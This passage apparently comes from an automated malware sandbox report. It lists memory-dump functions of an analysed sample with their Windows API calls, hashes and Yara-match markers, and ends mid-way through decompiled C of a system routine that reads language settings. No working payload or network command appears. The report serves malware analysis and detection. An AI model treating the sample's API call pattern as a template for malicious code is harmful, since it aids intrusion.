                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009A06C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateFree
                                                              • String ID: .z`
                                                              • API String ID: 2488874121-1441809116
                                                              • Opcode ID: b9f5d7beff6811bf42c1e918aa6cbdcc38d4df4f8ffc76b34abeefe297cac7d7
                                                              • Instruction ID: 1d3a6874c8bbb03c9bf862e42c83d609ff1df22460e869632dfc6a47ee1535da
                                                              • Opcode Fuzzy Hash: b9f5d7beff6811bf42c1e918aa6cbdcc38d4df4f8ffc76b34abeefe297cac7d7
                                                              • Instruction Fuzzy Hash: 16F0A9B52006086FDB14EF68DC81EEB77A8FF88314F018649FC4997242D231E8148AF1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009A062, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: 100579d0e3087e41a6f272014cd3bc6f1647c2e89b2d96fb70fb5e8df9cb266d
                                                              • Instruction ID: 55b869e3725c8c30a88a8441c62c77807988a75a2bb1252e7c115db44359fc3d
                                                              • Opcode Fuzzy Hash: 100579d0e3087e41a6f272014cd3bc6f1647c2e89b2d96fb70fb5e8df9cb266d
                                                              • Instruction Fuzzy Hash: 1FE026B82042452BDF00EF28DCC08EB7780BF827207149A05F85847367C231E41A97B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction ID: a7483037e4c1910e9d9a21d5e5a2e149c0cc1c863966a88349e8802865b111dc
                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction Fuzzy Hash: F5E04FB12002086BDB14DF59CC45EE777ACEF88750F018554FD0857242C630F910CAF0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000882E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 48bf2d1d9b2e611ed7fb8b8da7cd936dc77c48ce28b15b2a47b03c00983b13da
                                                              • Instruction ID: ba1d00db81d237a79f66ef8ac3fde4200699535a0d73116e38ea74323af01b68
                                                              • Opcode Fuzzy Hash: 48bf2d1d9b2e611ed7fb8b8da7cd936dc77c48ce28b15b2a47b03c00983b13da
                                                              • Instruction Fuzzy Hash: 6701B131A802287BEB20BA949C43FFE776CAB51F50F044019FB44BA1C2E6D46A0657E6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                              • Instruction ID: b15f46ee9257f5a5c87ffb515308c002f2a10d2124ddc5db4670f24c2034491f
                                                              • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                              • Instruction Fuzzy Hash: 9C018F31A802287AFB20B6949C43FFE776CAB51F51F044119FB04BA1C2EAD46A0657E6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00088373, Relevance: 3.0, APIs: 2, Instructions: 40threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: f7d6fe37ae95b6f1c0b4e7ea2a3a3fdd25cc61764511ce1b396693f825458785
                                                              • Instruction ID: 889bc32edf869aa7b280014140200e340601dacb2a42716c0ccd1d368f4ad78c
                                                              • Opcode Fuzzy Hash: f7d6fe37ae95b6f1c0b4e7ea2a3a3fdd25cc61764511ce1b396693f825458785
                                                              • Instruction Fuzzy Hash: 92F05532BC021836FA2071582C03FFEA68CBB82F11F18405AFF80F90C2E9C9290613E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction ID: 4a9b53bd2a9bc7990f2f7393a3eeed257928f61c893ff4aa5ad3e931d0c8cf1f
                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction Fuzzy Hash: 4D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction ID: ec980586e866633e4aeb80c8be97deace24af98f09b0c5f3d0675f8f0a4febe8
                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction Fuzzy Hash: 80E012B1200208ABDB14EF99CC81EA777ACEF88650F118558BA086B242C630F9108AF0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0009A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction ID: 4ff4872ce74a436925e1108b6439f3c92e3127fea3b99fbfc9c4cc2734285a84
                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction Fuzzy Hash: 55E01AB12002086BDB10DF49CC85EE737ADEF89650F018154BA0867242C930E8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0008F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                              • Instruction ID: 6417aeeebd7252583303f3220bff117056388d79c37cbfd200bc3d3567543684
                                                              • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                              • Instruction Fuzzy Hash: 22D0A7717903043BEA10FAA49C03F6632CD6B44B04F490074FA88D73C3E950E4014165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 00AB8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00AB8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00AB8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A9E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00AB718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00AB8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00AB718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00AB8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00AB8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00AB8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00AB718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A9E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A92340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00AAE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A9E2A8(_t322,  &_v68, _v16);
								if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00AAE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A9E2A8(_t322,  &_v68, _t236);
								if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00AB718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A9E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A92340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00AAE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A9E2A8(_v12,  &_v68, _v16);
							if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00AAE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A9E2A8(_t322,  &_v68, _t269);
							if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
